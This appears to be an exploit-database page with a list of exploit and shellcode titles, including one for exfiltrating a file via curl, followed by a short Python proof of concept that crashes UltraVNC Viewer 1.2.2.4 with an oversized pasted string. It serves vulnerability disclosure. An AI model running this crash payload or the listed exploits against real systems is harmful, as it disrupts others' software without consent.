
13 changes to exploits/shellcodes UltraVNC Viewer 1.2.2.4 - 'VNC Server' Denial of Service (PoC) UltraVNC Launcher 1.2.2.4 - 'Path' Denial of Service (PoC) MailCarrier 2.51 - 'RCPT TO' Buffer Overflow RemoteMouse 3.008 - Arbitrary Remote Command Execution CuteNews 2.1.2 - 'avatar' Remote Code Execution (Metasploit) MailCarrier 2.51 - POP3 'USER' Buffer Overflow MailCarrier 2.51 - POP3 'LIST' SEH Buffer Overflow MailCarrier 2.51 - POP3 'TOP' SEH Buffer Overflow Cisco RV130W Routers - Management Interface Remote Command Execution (Metasploit) Manage Engine ServiceDesk Plus 10.0 - Privilege Escalation DirectAdmin 1.561 - Multiple Vulnerabilities Linux/x86 - MMX-PUNPCKLBW Encoder Shellcode (61 bytes) Linux/x86 - Cat File Encode to base64 and post via curl to Webserver Shellcode (125 bytes)
21 lines
No EOL
653 B
Python
Executable file
21 lines
No EOL
653 B
Python
Executable file
#Exploit Title: UltraVNC Viewer 1.2.2.4 - Denial of Service (PoC)
|
|
#Discovery by: Victor Mondragón
|
|
#Discovery Date: 2019-04-14
|
|
#Vendor Homepage: https://www.uvnc.com/
|
|
#Software Link: https://www.uvnc.com/downloads/ultravnc/126-download-ultravnc-1224.html
|
|
#Tested Version: 1.2.2.4
|
|
#Tested on: Windows 7 x64 Service Pack 1
|
|
|
|
#Steps to produce the crash:
|
|
#1.- Run python code: UltraVNC_Viewer_1.2.2.4.py
|
|
#2.- Open UltraViewer.txt and copy content to clipboard
|
|
#3.- Open UltraVNC Viewer
|
|
#4.- In "VNC Server" Paste Clipboard
|
|
#5.- Click on "Connect"
|
|
#6.- Crashed
|
|
|
|
cod = "\x41" * 256
|
|
|
|
f = open('UltraViewer.txt', 'w')
|
|
f.write(cod)
|
|
f.close() |